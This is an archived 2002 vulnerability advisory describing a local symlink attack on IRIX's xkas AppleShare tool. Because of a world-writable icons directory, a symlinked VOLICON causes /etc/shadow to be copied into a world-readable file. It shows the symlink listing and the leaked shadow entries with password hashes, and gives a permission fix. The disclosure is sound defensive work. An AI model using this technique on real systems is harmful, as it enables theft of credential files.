[ Hackerslab bug_paper ] Xkas application vulnerability

2002-01-28T00:00:00
ID SECURITYVULNS:DOC:2413
Type securityvulns
Reporter Securityvulns
Modified 2002-01-28T00:00:00

Description

=============================================================================

   [ Hackerslab bug_paper ] Xkas application vulnerability

=============================================================================

File : /usr/etc/appletalk/xkas application

SYSTEM : tested irix 6.5

INFO :

Xkas is a server administration tool for appleshare. Misconfiguration by the user with the root privilege could lead to a serious security vulnerability.

.HSResource directory and .HSicon file is created when sharing a directory. Creation of the HSicon file is accomplished by copying the /var/adm/appletalk/icons/VOLICON file. A problem occurs during this process because the permission of /var/adm/appletalk/icons directory is set to 777 (world-writeable). Link the wanted file with VOLICON like the following.

$ ls -al /var/adm/appletalk/icons total 8 drwxrwxrwx 4 root sys 57 Jan 25 03:12 . drwxr-xr-x 6 root sys 4096 Jan 24 16:05 .. drwxr-xr-x 2 root sys 9 Jan 25 03:12 .HSResource lrwxr-xr-x 1 loveyou user 11 Jan 25 03:05 VOLICON -> /etc/shadow

When the administrator uses the /usr/etc/appletalk/xkas directory to share the root directory, the following files are created in the root. $ ls -al / total 17099 drwxr-xr-x 37 root sys 4096 Jan 25 03:30 . drwxr-xr-x 37 root sys 4096 Jan 25 03:30 .. drwxr-xr-x 2 root sys 9 Jan 25 03:30 .HSResource -rw-r--r-- 1 root sys 786 Jan 25 03:30 .HSicon
(etc..)

$ cat /.HSicon root:y7floveyous30I:10908:::::: bin:yxaiFduxixe8s:11127:::::: uucp::11127:::::: sys::11127:::::: adm:*:11127:::::: loveyou:mXaa2jxi/ejY:10877:::::: (etc..)

SOLUTION : Remove other-write permission, contact your vendor and get a patch. $ su -

chmod o-w /var/adm/appletalk/icons

==-------------------------------------------------------------------------== * * * * * * * * * Kim Yong-Jun * * * loveyou@hackerslab.org * * * [ http://www.hackerslab.org ] ** HACKERSLAB (C) since 1999 ==-------------------------------------------------------------------------== їлБШ